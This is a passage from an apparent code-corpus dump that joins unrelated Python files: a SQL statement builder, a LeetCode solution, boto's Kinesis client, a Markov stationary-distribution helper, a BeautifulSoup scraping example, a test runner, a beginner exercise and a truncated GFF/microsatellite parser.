def generate_query_order_by(self, order_by):
query = ''
if order_by:
query += 'ORDER BY '
segs = []
for field_clause in order_by:
if field_clause._field.startswith('-'):
field_clause._field = field_clause._field[1:]
seg = field_clause.field + ' DESC'
else:
seg = field_clause.field
segs.append(seg)
query += ', '.join(segs)
return query
class SelectStatement(BaseSQLStatement):
BASE_QUERY = 'SELECT {} FROM {} {}'
def __init__(self, table, fields=None, where=None, order_by=None, limit=None):
super().__init__()
self.table = table
self.fields = fields
self.where = where
self.order_by = order_by
self.limit = limit
def as_sql(self):
query_table = self.generate_query_field(self.table)
query_fields = self.generate_query_fields(self.fields)
query_where = self.generate_query_where(self.where)
query_order_by = self.generate_query_order_by(self.order_by)
query_limit = self.generate_query_limit(self.limit)
extra_query = ' '.join([
i for i in [query_where, query_order_by, query_limit] if i
])
self.query = self.BASE_QUERY.format(
query_fields, query_table, extra_query
)
return self.query, self.params
class DeleteStatement(BaseSQLStatement):
BASE_QUERY = 'DELETE FROM {} {}'
def __init__(self, table, where=None):
super().__init__()
self.table = table
self.where = where
def as_sql(self):
query_table = self.generate_query_field(self.table)
query_where = self.generate_query_where(self.where)
extra_query = query_where
self.query = self.BASE_QUERY.format(
query_table, extra_query
)
return self.query, self.params
class CreateStatement(BaseSQLStatement):
BASE_QUERY = '{} INTO {} ({}) VALUES ({})'
def __init__(self, table, assignments, mode, compress_fields):
super().__init__()
self.table = table
self.assignments = assignments
self.mode = mode
self.compress_fields = compress_fields
def generate_query_mode(self, mode):
if mode == 'INSERT':
return 'INSERT'
elif mode == 'IGNORE':
return 'INSERT IGNORE'
elif mode == 'REPLACE':
return 'REPLACE'
def generate_query_fields_values(self, assignments, compress_fields):
fields = [a.field for a in assignments]
query_values = ['%s']*len(assignments)
if type(compress_fields) == list:
for index, field in enumerate(fields):
for cf in compress_fields:
if '`'+cf+'`' == field: # field should be like '`id`'
query_values[index] = 'COMPRESS(%s)'
query_fields = ', '.join(fields)
query_values = ', '.join(query_values)
for a in assignments:
self.params.append(a.value)
return query_fields, query_values
def as_sql(self):
query_mode = self.generate_query_mode(self.mode)
query_table = self.generate_query_field(self.table)
query_fields, query_values = self.generate_query_fields_values(
self.assignments, self.compress_fields
)
self.query = self.BASE_QUERY.format(
query_mode, query_table, query_fields, query_values
)
return self.query, self.params
class UpdateStatement(BaseSQLStatement):
BASE_QUERY = 'UPDATE {} SET {} {}'
def __init__(self, table, assignments, where=None):
super().__init__()
self.table = table
self.assignments = assignments
self.where = where
def generate_query_fields_values(self, assignments):
query = ', '.join(
[a.field + '=%s' for a in assignments]
)
for a in assignments:
self.params.append(a.value)
return query
def as_sql(self):
query_table = self.generate_query_field(self.table)
query_fields_values = self.generate_query_fields_values(
self.assignments)
query_where = self.generate_query_where(self.where)
self.query = self.BASE_QUERY.format(
query_table, query_fields_values, query_where
)
return self.query, self.params
def where_clauses_from_filters(filters):
where_clauses = []
for op, k, v in filters:
where_clause = WhereClause(k, op, v)
where_clauses.append(where_clause)
return where_clauses
def assignment_clauses_clauses_from_filters(data):
assignment_clauses = []
for k, v in data.items():
clause = AssignmentClause(k, v)
assignment_clauses.append(clause)
return assignment_clauses
def query_parameters_from_create(collection, data, mode='INSERT', compress_fields=None):
table = FieldClause(collection)
assignments = assignment_clauses_clauses_from_filters(data)
query, params = CreateStatement(table, assignments, mode, compress_fields).as_sql()
return query, params
def query_parameters_from_update(collection, filters, data):
table = FieldClause(collection)
assignments = assignment_clauses_clauses_from_filters(data)
where = where_clauses_from_filters(filters)
query, params = UpdateStatement(table, assignments, where).as_sql()
return query, params
def query_parameters_from_get(collection, filters, fields=None):
table = FieldClause(collection)
where = where_clauses_from_filters(filters)
fields = [FieldClause(f) for f in (fields or [])]
query, params = SelectStatement(table, fields, where, limit=1).as_sql()
return query, params
def query_parameters_from_delete(collection, filters):
table = FieldClause(collection)
where = where_clauses_from_filters(filters)
query, params = DeleteStatement(table, where).as_sql()
return query, params
def query_parameters_from_filter(
collection, filters, fields=None, order_by=None, limit=None):
table = FieldClause(collection)
where = where_clauses_from_filters(filters)
fields = [FieldClause(f) for f in (fields or [])]
if order_by is None:
order_by = []
elif isinstance(order_by, str):
order_by = [order_by]
order_by = [FieldClause(f) for f in order_by]
query, params = SelectStatement(
table, fields, where, order_by, limit).as_sql()
return query, params
| 2.90625 | 3 |
solutions/2121.py | pacokwon/leetcode | 2 | 12770756 | # Intervals Between Identical Elements
from typing import List
from collections import defaultdict
class Solution:
def getDistances(self, arr: List[int]) -> List[int]:
indices = defaultdict(list)
for index, n in enumerate(arr):
indices[n].append(index)
ans = [0] * len(arr)
for _, inds in indices.items():
ps = [0] * len(inds)
for ith, ind in enumerate(inds):
if ith == 0:
ps[0] = ind
else:
ps[ith] = ps[ith - 1] + ind
for ith, ind in enumerate(inds):
ans[ind] = abs((ith + 1) * ind - ps[ith]) + abs((len(inds) - 1 - ith) * ind - (ps[len(inds) - 1] - ps[ith]))
return ans
if __name__ == "__main__":
sol = Solution()
arr = [2,1,3,1,2,3,3]
arr = [10,5,10,10]
print(sol.getDistances(arr))
| 3.421875 | 3 |
boto/kinesis/layer1.py | Grindizer/boto | 6 | 12770757 | # Copyright (c) 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import base64
import boto
from boto.connection import AWSQueryConnection
from boto.regioninfo import RegionInfo
from boto.exception import JSONResponseError
from boto.kinesis import exceptions
from boto.compat import json
class KinesisConnection(AWSQueryConnection):
"""
Amazon Kinesis Service API Reference
Amazon Kinesis is a managed service that scales elastically for
real time processing of streaming big data.
"""
APIVersion = "2013-12-02"
DefaultRegionName = "us-east-1"
DefaultRegionEndpoint = "kinesis.us-east-1.amazonaws.com"
ServiceName = "Kinesis"
TargetPrefix = "Kinesis_20131202"
ResponseError = JSONResponseError
_faults = {
"ProvisionedThroughputExceededException": exceptions.ProvisionedThroughputExceededException,
"LimitExceededException": exceptions.LimitExceededException,
"ExpiredIteratorException": exceptions.ExpiredIteratorException,
"ResourceInUseException": exceptions.ResourceInUseException,
"ResourceNotFoundException": exceptions.ResourceNotFoundException,
"InvalidArgumentException": exceptions.InvalidArgumentException,
"SubscriptionRequiredException": exceptions.SubscriptionRequiredException
}
def __init__(self, **kwargs):
region = kwargs.pop('region', None)
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionEndpoint)
if 'host' not in kwargs:
kwargs['host'] = region.endpoint
super(KinesisConnection, self).__init__(**kwargs)
self.region = region
def _required_auth_capability(self):
return ['hmac-v4']
def create_stream(self, stream_name, shard_count):
"""
This operation adds a new Amazon Kinesis stream to your AWS
account. A stream captures and transports data records that
are continuously emitted from different data sources or
producers . Scale-out within an Amazon Kinesis stream is
explicitly supported by means of shards, which are uniquely
identified groups of data records in an Amazon Kinesis stream.
You specify and control the number of shards that a stream is
composed of. Each shard can support up to 5 read transactions
per second up to a maximum total of 2 MB of data read per
second. Each shard can support up to 1000 write transactions
per second up to a maximum total of 1 MB data written per
second. You can add shards to a stream if the amount of data
input increases and you can remove shards if the amount of
data input decreases.
The stream name identifies the stream. The name is scoped to
the AWS account used by the application. It is also scoped by
region. That is, two streams in two different accounts can
have the same name, and two streams in the same account, but
in two different regions, can have the same name.
`CreateStream` is an asynchronous operation. Upon receiving a
`CreateStream` request, Amazon Kinesis immediately returns and
sets the stream status to CREATING. After the stream is
created, Amazon Kinesis sets the stream status to ACTIVE. You
should perform read and write operations only on an ACTIVE
stream.
You receive a `LimitExceededException` when making a
`CreateStream` request if you try to do one of the following:
+ Have more than five streams in the CREATING state at any
point in time.
+ Create more shards than are authorized for your account.
**Note:** The default limit for an AWS account is two shards
per stream. If you need to create a stream with more than two
shards, contact AWS Support to increase the limit on your
account.
You can use the `DescribeStream` operation to check the stream
status, which is returned in `StreamStatus`.
`CreateStream` has a limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: A name to identify the stream. The stream name is
scoped to the AWS account used by the application that creates the
stream. It is also scoped by region. That is, two streams in two
different AWS accounts can have the same name, and two streams in
the same AWS account, but in two different regions, can have the
same name.
:type shard_count: integer
:param shard_count: The number of shards that the stream will use. The
throughput of the stream is a function of the number of shards;
more shards are required for greater provisioned throughput.
**Note:** The default limit for an AWS account is two shards per
stream. If you need to create a stream with more than two shards,
contact AWS Support to increase the limit on your account.
"""
params = {
'StreamName': stream_name,
'ShardCount': shard_count,
}
return self.make_request(action='CreateStream',
body=json.dumps(params))
def delete_stream(self, stream_name):
"""
This operation deletes a stream and all of its shards and
data. You must shut down any applications that are operating
on the stream before you delete the stream. If an application
attempts to operate on a deleted stream, it will receive the
exception `ResourceNotFoundException`.
If the stream is in the ACTIVE state, you can delete it. After
a `DeleteStream` request, the specified stream is in the
DELETING state until Amazon Kinesis completes the deletion.
**Note:** Amazon Kinesis might continue to accept data read
and write operations, such as PutRecord and GetRecords, on a
stream in the DELETING state until the stream deletion is
complete.
When you delete a stream, any shards in that stream are also
deleted.
You can use the DescribeStream operation to check the state of
the stream, which is returned in `StreamStatus`.
`DeleteStream` has a limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream to delete.
"""
params = {'StreamName': stream_name, }
return self.make_request(action='DeleteStream',
body=json.dumps(params))
def describe_stream(self, stream_name, limit=None,
exclusive_start_shard_id=None):
"""
This operation returns the following information about the
stream: the current status of the stream, the stream Amazon
Resource Name (ARN), and an array of shard objects that
comprise the stream. For each shard object there is
information about the hash key and sequence number ranges that
the shard spans, and the IDs of any earlier shards that played
in a role in a MergeShards or SplitShard operation that
created the shard. A sequence number is the identifier
associated with every record ingested in the Amazon Kinesis
stream. The sequence number is assigned by the Amazon Kinesis
service when a record is put into the stream.
You can limit the number of returned shards using the `Limit`
parameter. The number of shards in a stream may be too large
to return from a single call to `DescribeStream`. You can
detect this by using the `HasMoreShards` flag in the returned
output. `HasMoreShards` is set to `True` when there is more
data available.
If there are more shards available, you can request more
shards by using the shard ID of the last shard returned by the
`DescribeStream` request, in the `ExclusiveStartShardId`
parameter in a subsequent request to `DescribeStream`.
`DescribeStream` is a paginated operation.
`DescribeStream` has a limit of 10 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream to describe.
:type limit: integer
:param limit: The maximum number of shards to return.
:type exclusive_start_shard_id: string
:param exclusive_start_shard_id: The shard ID of the shard to start
with for the stream description.
"""
params = {'StreamName': stream_name, }
if limit is not None:
params['Limit'] = limit
if exclusive_start_shard_id is not None:
params['ExclusiveStartShardId'] = exclusive_start_shard_id
return self.make_request(action='DescribeStream',
body=json.dumps(params))
def get_records(self, shard_iterator, limit=None, b64_decode=True):
"""
This operation returns one or more data records from a shard.
A `GetRecords` operation request can retrieve up to 10 MB of
data.
You specify a shard iterator for the shard that you want to
read data from in the `ShardIterator` parameter. The shard
iterator specifies the position in the shard from which you
want to start reading data records sequentially. A shard
iterator specifies this position using the sequence number of
a data record in the shard. For more information about the
shard iterator, see GetShardIterator.
`GetRecords` may return a partial result if the response size
limit is exceeded. You will get an error, but not a partial
result if the shard's provisioned throughput is exceeded, the
shard iterator has expired, or an internal processing failure
has occurred. Clients can request a smaller amount of data by
specifying a maximum number of returned records using the
`Limit` parameter. The `Limit` parameter can be set to an
integer value of up to 10,000. If you set the value to an
integer greater than 10,000, you will receive
`InvalidArgumentException`.
A new shard iterator is returned by every `GetRecords` request
in `NextShardIterator`, which you use in the `ShardIterator`
parameter of the next `GetRecords` request. When you
repeatedly read from an Amazon Kinesis stream use a
GetShardIterator request to get the first shard iterator to
use in your first `GetRecords` request and then use the shard
iterator returned in `NextShardIterator` for subsequent reads.
`GetRecords` can return `null` for the `NextShardIterator` to
reflect that the shard has been closed and that the requested
shard iterator would never have returned more data.
If no items can be processed because of insufficient
provisioned throughput on the shard involved in the request,
`GetRecords` throws `ProvisionedThroughputExceededException`.
:type shard_iterator: string
:param shard_iterator: The position in the shard from which you want to
start sequentially reading data records.
:type limit: integer
:param limit: The maximum number of records to return, which can be set
to a value of up to 10,000.
:type b64_decode: boolean
:param b64_decode: Decode the Base64-encoded ``Data`` field of records.
"""
params = {'ShardIterator': shard_iterator, }
if limit is not None:
params['Limit'] = limit
response = self.make_request(action='GetRecords',
body=json.dumps(params))
# Base64 decode the data
if b64_decode:
for record in response.get('Records', []):
record['Data'] = base64.b64decode(
record['Data'].encode('utf-8')).decode('utf-8')
return response
def get_shard_iterator(self, stream_name, shard_id, shard_iterator_type,
starting_sequence_number=None):
"""
This operation returns a shard iterator in `ShardIterator`.
The shard iterator specifies the position in the shard from
which you want to start reading data records sequentially. A
shard iterator specifies this position using the sequence
number of a data record in a shard. A sequence number is the
identifier associated with every record ingested in the Amazon
Kinesis stream. The sequence number is assigned by the Amazon
Kinesis service when a record is put into the stream.
You must specify the shard iterator type in the
`GetShardIterator` request. For example, you can set the
`ShardIteratorType` parameter to read exactly from the
position denoted by a specific sequence number by using the
AT_SEQUENCE_NUMBER shard iterator type, or right after the
sequence number by using the AFTER_SEQUENCE_NUMBER shard
iterator type, using sequence numbers returned by earlier
PutRecord, GetRecords or DescribeStream requests. You can
specify the shard iterator type TRIM_HORIZON in the request to
cause `ShardIterator` to point to the last untrimmed record in
the shard in the system, which is the oldest data record in
the shard. Or you can point to just after the most recent
record in the shard, by using the shard iterator type LATEST,
so that you always read the most recent data in the shard.
**Note:** Each shard iterator expires five minutes after it is
returned to the requester.
When you repeatedly read from an Amazon Kinesis stream use a
GetShardIterator request to get the first shard iterator to to
use in your first `GetRecords` request and then use the shard
iterator returned by the `GetRecords` request in
`NextShardIterator` for subsequent reads. A new shard iterator
is returned by every `GetRecords` request in
`NextShardIterator`, which you use in the `ShardIterator`
parameter of the next `GetRecords` request.
If a `GetShardIterator` request is made too often, you will
receive a `ProvisionedThroughputExceededException`. For more
information about throughput limits, see the `Amazon Kinesis
Developer Guide`_.
`GetShardIterator` can return `null` for its `ShardIterator`
to indicate that the shard has been closed and that the
requested iterator will return no more data. A shard can be
closed by a SplitShard or MergeShards operation.
`GetShardIterator` has a limit of 5 transactions per second
per account per shard.
:type stream_name: string
:param stream_name: The name of the stream.
:type shard_id: string
:param shard_id: The shard ID of the shard to get the iterator for.
:type shard_iterator_type: string
:param shard_iterator_type:
Determines how the shard iterator is used to start reading data records
from the shard.
The following are the valid shard iterator types:
+ AT_SEQUENCE_NUMBER - Start reading exactly from the position denoted
by a specific sequence number.
+ AFTER_SEQUENCE_NUMBER - Start reading right after the position
denoted by a specific sequence number.
+ TRIM_HORIZON - Start reading at the last untrimmed record in the
shard in the system, which is the oldest data record in the shard.
+ LATEST - Start reading just after the most recent record in the
shard, so that you always read the most recent data in the shard.
:type starting_sequence_number: string
:param starting_sequence_number: The sequence number of the data record
in the shard from which to start reading from.
"""
params = {
'StreamName': stream_name,
'ShardId': shard_id,
'ShardIteratorType': shard_iterator_type,
}
if starting_sequence_number is not None:
params['StartingSequenceNumber'] = starting_sequence_number
return self.make_request(action='GetShardIterator',
body=json.dumps(params))
def list_streams(self, limit=None, exclusive_start_stream_name=None):
"""
This operation returns an array of the names of all the
streams that are associated with the AWS account making the
`ListStreams` request. A given AWS account can have many
streams active at one time.
The number of streams may be too large to return from a single
call to `ListStreams`. You can limit the number of returned
streams using the `Limit` parameter. If you do not specify a
value for the `Limit` parameter, Amazon Kinesis uses the
default limit, which is currently 10.
You can detect if there are more streams available to list by
using the `HasMoreStreams` flag from the returned output. If
there are more streams available, you can request more streams
by using the name of the last stream returned by the
`ListStreams` request in the `ExclusiveStartStreamName`
parameter in a subsequent request to `ListStreams`. The group
of stream names returned by the subsequent request is then
added to the list. You can continue this process until all the
stream names have been collected in the list.
`ListStreams` has a limit of 5 transactions per second per
account.
:type limit: integer
:param limit: The maximum number of streams to list.
:type exclusive_start_stream_name: string
:param exclusive_start_stream_name: The name of the stream to start the
list with.
"""
params = {}
if limit is not None:
params['Limit'] = limit
if exclusive_start_stream_name is not None:
params['ExclusiveStartStreamName'] = exclusive_start_stream_name
return self.make_request(action='ListStreams',
body=json.dumps(params))
def merge_shards(self, stream_name, shard_to_merge,
adjacent_shard_to_merge):
"""
This operation merges two adjacent shards in a stream and
combines them into a single shard to reduce the stream's
capacity to ingest and transport data. Two shards are
considered adjacent if the union of the hash key ranges for
the two shards form a contiguous set with no gaps. For
example, if you have two shards, one with a hash key range of
276...381 and the other with a hash key range of 382...454,
then you could merge these two shards into a single shard that
would have a hash key range of 276...454. After the merge, the
single child shard receives data for all hash key values
covered by the two parent shards.
`MergeShards` is called when there is a need to reduce the
overall capacity of a stream because of excess capacity that
is not being used. The operation requires that you specify the
shard to be merged and the adjacent shard for a given stream.
For more information about merging shards, see the `Amazon
Kinesis Developer Guide`_.
If the stream is in the ACTIVE state, you can call
`MergeShards`. If a stream is in CREATING or UPDATING or
DELETING states, then Amazon Kinesis returns a
`ResourceInUseException`. If the specified stream does not
exist, Amazon Kinesis returns a `ResourceNotFoundException`.
You can use the DescribeStream operation to check the state of
the stream, which is returned in `StreamStatus`.
`MergeShards` is an asynchronous operation. Upon receiving a
`MergeShards` request, Amazon Kinesis immediately returns a
response and sets the `StreamStatus` to UPDATING. After the
operation is completed, Amazon Kinesis sets the `StreamStatus`
to ACTIVE. Read and write operations continue to work while
the stream is in the UPDATING state.
You use the DescribeStream operation to determine the shard
IDs that are specified in the `MergeShards` request.
If you try to operate on too many streams in parallel using
CreateStream, DeleteStream, `MergeShards` or SplitShard, you
will receive a `LimitExceededException`.
`MergeShards` has limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream for the merge.
:type shard_to_merge: string
:param shard_to_merge: The shard ID of the shard to combine with the
adjacent shard for the merge.
:type adjacent_shard_to_merge: string
:param adjacent_shard_to_merge: The shard ID of the adjacent shard for
the merge.
"""
params = {
'StreamName': stream_name,
'ShardToMerge': shard_to_merge,
'AdjacentShardToMerge': adjacent_shard_to_merge,
}
return self.make_request(action='MergeShards',
body=json.dumps(params))
def put_record(self, stream_name, data, partition_key,
explicit_hash_key=None,
sequence_number_for_ordering=None,
exclusive_minimum_sequence_number=None,
b64_encode=True):
"""
This operation puts a data record into an Amazon Kinesis
stream from a producer. This operation must be called to send
data from the producer into the Amazon Kinesis stream for
real-time ingestion and subsequent processing. The `PutRecord`
operation requires the name of the stream that captures,
stores, and transports the data; a partition key; and the data
blob itself. The data blob could be a segment from a log file,
geographic/location data, website clickstream data, or any
other data type.
The partition key is used to distribute data across shards.
Amazon Kinesis segregates the data records that belong to a
data stream into multiple shards, using the partition key
associated with each data record to determine which shard a
given data record belongs to.
Partition keys are Unicode strings, with a maximum length
limit of 256 bytes. An MD5 hash function is used to map
partition keys to 128-bit integer values and to map associated
data records to shards using the hash key ranges of the
shards. You can override hashing the partition key to
determine the shard by explicitly specifying a hash value
using the `ExplicitHashKey` parameter. For more information,
see the `Amazon Kinesis Developer Guide`_.
`PutRecord` returns the shard ID of where the data record was
placed and the sequence number that was assigned to the data
record.
Sequence numbers generally increase over time. To guarantee
strictly increasing ordering, use the
`SequenceNumberForOrdering` parameter. For more information,
see the `Amazon Kinesis Developer Guide`_.
If a `PutRecord` request cannot be processed because of
insufficient provisioned throughput on the shard involved in
the request, `PutRecord` throws
`ProvisionedThroughputExceededException`.
Data records are accessible for only 24 hours from the time
that they are added to an Amazon Kinesis stream.
:type stream_name: string
:param stream_name: The name of the stream to put the data record into.
:type data: blob
:param data: The data blob to put into the record, which is
Base64-encoded when the blob is serialized.
The maximum size of the data blob (the payload after
Base64-decoding) is 50 kilobytes (KB)
Set `b64_encode` to disable automatic Base64 encoding.
:type partition_key: string
:param partition_key: Determines which shard in the stream the data
record is assigned to. Partition keys are Unicode strings with a
maximum length limit of 256 bytes. Amazon Kinesis uses the
partition key as input to a hash function that maps the partition
key and associated data to a specific shard. Specifically, an MD5
hash function is used to map partition keys to 128-bit integer
values and to map associated data records to shards. As a result of
this hashing mechanism, all data records with the same partition
key will map to the same shard within the stream.
:type explicit_hash_key: string
:param explicit_hash_key: The hash value used to explicitly determine
the shard the data record is assigned to by overriding the
partition key hash.
:type sequence_number_for_ordering: string
:param sequence_number_for_ordering: Guarantees strictly increasing
sequence numbers, for puts from the same client and to the same
partition key. Usage: set the `SequenceNumberForOrdering` of record
n to the sequence number of record n-1 (as returned in the
PutRecordResult when putting record n-1 ). If this parameter is not
set, records will be coarsely ordered based on arrival time.
:type b64_encode: boolean
:param b64_encode: Whether to Base64 encode `data`. Can be set to
``False`` if `data` is already encoded to prevent double encoding.
"""
params = {
'StreamName': stream_name,
'Data': data,
'PartitionKey': partition_key,
}
if explicit_hash_key is not None:
params['ExplicitHashKey'] = explicit_hash_key
if sequence_number_for_ordering is not None:
params['SequenceNumberForOrdering'] = sequence_number_for_ordering
if b64_encode:
params['Data'] = base64.b64encode(
params['Data'].encode('utf-8')).decode('utf-8')
return self.make_request(action='PutRecord',
body=json.dumps(params))
def split_shard(self, stream_name, shard_to_split, new_starting_hash_key):
"""
This operation splits a shard into two new shards in the
stream, to increase the stream's capacity to ingest and
transport data. `SplitShard` is called when there is a need to
increase the overall capacity of stream because of an expected
increase in the volume of data records being ingested.
`SplitShard` can also be used when a given shard appears to be
approaching its maximum utilization, for example, when the set
of producers sending data into the specific shard are suddenly
sending more than previously anticipated. You can also call
the `SplitShard` operation to increase stream capacity, so
that more Amazon Kinesis applications can simultaneously read
data from the stream for real-time processing.
The `SplitShard` operation requires that you specify the shard
to be split and the new hash key, which is the position in the
shard where the shard gets split in two. In many cases, the
new hash key might simply be the average of the beginning and
ending hash key, but it can be any hash key value in the range
being mapped into the shard. For more information about
splitting shards, see the `Amazon Kinesis Developer Guide`_.
You can use the DescribeStream operation to determine the
shard ID and hash key values for the `ShardToSplit` and
`NewStartingHashKey` parameters that are specified in the
`SplitShard` request.
`SplitShard` is an asynchronous operation. Upon receiving a
`SplitShard` request, Amazon Kinesis immediately returns a
response and sets the stream status to UPDATING. After the
operation is completed, Amazon Kinesis sets the stream status
to ACTIVE. Read and write operations continue to work while
the stream is in the UPDATING state.
You can use `DescribeStream` to check the status of the
stream, which is returned in `StreamStatus`. If the stream is
in the ACTIVE state, you can call `SplitShard`. If a stream is
in CREATING or UPDATING or DELETING states, then Amazon
Kinesis returns a `ResourceInUseException`.
If the specified stream does not exist, Amazon Kinesis returns
a `ResourceNotFoundException`. If you try to create more
shards than are authorized for your account, you receive a
`LimitExceededException`.
**Note:** The default limit for an AWS account is two shards
per stream. If you need to create a stream with more than two
shards, contact AWS Support to increase the limit on your
account.
If you try to operate on too many streams in parallel using
CreateStream, DeleteStream, MergeShards or SplitShard, you
will receive a `LimitExceededException`.
`SplitShard` has limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream for the shard split.
:type shard_to_split: string
:param shard_to_split: The shard ID of the shard to split.
:type new_starting_hash_key: string
:param new_starting_hash_key: A hash key value for the starting hash
key of one of the child shards created by the split. The hash key
range for a given shard constitutes a set of ordered contiguous
positive integers. The value for `NewStartingHashKey` must be in
the range of hash keys being mapped into the shard. The
`NewStartingHashKey` hash key value and all higher hash key values
in hash key range are distributed to one of the child shards. All
the lower hash key values in the range are distributed to the other
child shard.
"""
params = {
'StreamName': stream_name,
'ShardToSplit': shard_to_split,
'NewStartingHashKey': new_starting_hash_key,
}
return self.make_request(action='SplitShard',
body=json.dumps(params))
def make_request(self, action, body):
headers = {
'X-Amz-Target': '%s.%s' % (self.TargetPrefix, action),
'Host': self.region.endpoint,
'Content-Type': 'application/x-amz-json-1.1',
'Content-Length': str(len(body)),
}
http_request = self.build_base_http_request(
method='POST', path='/', auth_path='/', params={},
headers=headers, data=body)
response = self._mexe(http_request, sender=None,
override_num_retries=10)
response_body = response.read().decode('utf-8')
boto.log.debug(response.getheaders())
boto.log.debug(response_body)
if response.status == 200:
if response_body:
return json.loads(response_body)
else:
json_body = json.loads(response_body)
fault_name = json_body.get('__type', None)
exception_class = self._faults.get(fault_name, self.ResponseError)
raise exception_class(response.status, response.reason,
body=json_body)
| 1.625 | 2 |
src/hierarchy/stationary.py | drvinceknight/HierarchicalPromotion | 0 | 12770758 | import numpy as np
import hierarchy as hrcy
def get_stationary_distribution(capacities, r, lmbda, mu):
assert capacities[-1] == 1
matrix = hrcy.transitions.get_transition_matrix(
capacities=capacities, r=r, lmbda=lmbda, mu=mu
)
dimension = matrix.shape[0]
M = np.vstack((matrix.transpose(), np.ones(dimension)))
b = np.vstack((np.zeros((dimension, 1)), [1]))
return np.linalg.lstsq(M, b)[0].transpose()[0]
| 2.484375 | 2 |
Day_14_Web_Automation/using_soup.py | ValRCS/Python_TietoEvry_Sep2021 | 0 | 12770759 | import requests
from bs4 import BeautifulSoup as bs
url = "https://mdn.github.io/beginner-html-site/"
response = requests.get(url) # this is like going to our browser and going to the url
print(response.status_code) # 200 would be good 404 would be bad
print(response.text[:500]) # first 500 characters
# i could parse by hand but i can use beautiful soup
# # we parse our raw text html into a soup object
soup = bs(response.text, "html.parser") # html parser is optional we can tell it use lxml which might be better parser
print(soup.title)
print(type(soup))
headline = soup.find("h1") # there should only be one h1 tag in the html
print(headline)
print(headline.text) # gets you text
images = soup.find_all("img") # get all images tags
print(images)
print(len(images))
# we would want some logic here to test length of images
if len(images) > 0:
first_image = images[0]
print(first_image.attrs)
for key, value in first_image.attrs.items(): # attrs is a dictionary
print("attribute", key, "value:", value)
| 3.703125 | 4 |
regtests/test-all.py | ahakingdom/Rusthon | 622 | 12770760 | <filename>regtests/test-all.py
import os, subprocess
os.chdir( os.path.split(__file__)[0] )
subprocess.check_call(['python', 'test-c++.py'])
subprocess.check_call(['python', 'test-go.py'])
subprocess.check_call(['python', 'test-javascript.py'])
subprocess.check_call(['python', 'test-markdowns.py'])
| 2.109375 | 2 |
Trabalhos/Python/MiniEP/coordenada.py | phelipes2000/Ola-Mundo | 0 | 12770761 | <gh_stars>0
def coord(x,y):
if x > 0 and y > 0:
i = "I"
elif x > 0 and y < 0:
i = "IV"
elif x < 0 and y < 0:
i = "III"
elif x < 0 and y > 0:
i = "II"
print(f"O ponto ({x:.0f}, {y:.0f}) pertence ao quadrante: {i}")
print(" ")
def main():
a = float(input("Digite um valor para x: "))
b = float(input("Digite um valor para y: "))
print("")
coord(a,b)
main()
#--------------
#~~phelipes2000 | 3.8125 | 4 |
scripts/searcher.py | lmdu/PanMicrosatDB | 0 | 12770762 | <gh_stars>0
import os
import sys
import csv
import gzip
import time
import json
import numpy
import queue
import signal
import shutil
import sqlite3
import traceback
import itertools
import collections
import multiprocessing
from ..thirds import kseq, ncls, tandem
from ..thirds.motifs import MotifStandard
from ..config import Config
#minimum tandem repeats
min_tandem_repeats = [12, 7, 5, 4, 4, 4]
#min_tandem_repeats = [6, 3, 3, 3, 3, 3]
def make_folder(folder):
if not os.path.exists(folder):
os.makedirs(folder)
def concatenate_cssr(seqid, seq, cssrs):
start = cssrs[0][3]
end = cssrs[-1][4]
complexity = len(cssrs)
#length = sum(cssr[5] for cssr in cssrs)
length = end - start + 1
components = []
for i, cssr in enumerate(cssrs):
components.append("({}){}".format(cssr[0], cssr[2]))
if i < len(cssrs) - 1:
components.append(seq[cssr[4]:cssrs[i+1][3]-1])
structure = "".join(components)
return (None, seqid, start, end, complexity, length, structure)
class Data(dict):
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
def __setattr__(self, name, val):
self[name] = val
def gff_parser(annot_file):
with gzip.open(annot_file, 'rt') as fh:
for line in fh:
if line[0] == '#': continue
cols = line.strip().split('\t')
record = Data(
seqid = cols[0],
feature = cols[2].upper(),
start = int(cols[3]),
end = int(cols[4]),
attrs = Data()
)
for item in cols[-1].split(';'):
if not item:
continue
name, value = item.split('=')
record.attrs[name.strip().upper()] = value
yield record
def get_gff_coordinate(gff_file):
father = None
exons = []
parents = {}
for r in gff_parser(gff_file):
if r.feature == 'REGION':
continue
elif r.feature == 'GENE':
if 'ID' in r.attrs:
parents[r.attrs.ID] = r.attrs.ID
elif 'GENE' in r.attrs:
parents[r.attrs.GENE] = r.attrs.GENE
parents['gene-{}'.format(r.attrs.GENE)] = r.attrs.GENE
elif 'NAME' in r.attrs:
parents[r.attrs.NAME] = r.attrs.NAME
elif r.feature == 'CDS':
if 'PARENT' in r.attrs:
yield (r.seqid, r.start, r.end, 'CDS', parents[r.attrs.PARENT])
else:
yield (r.seqid, r.start, r.end, 'CDS', r.attrs.ID)
elif r.feature == 'FIVE_PRIME_UTR':
if 'PARENT' in r.attrs:
yield (r.seqid, r.start, r.end, '5UTR', parents[r.attrs.PARENT])
else:
yield (r.seqid, r.start, r.end, '5UTR', r.attrs.ID)
elif r.feature == 'THREE_PRIME_UTR':
if 'PARENT' in r.attrs:
yield (r.seqid, r.start, r.end, '3UTR', parents[r.attrs.PARENT])
else:
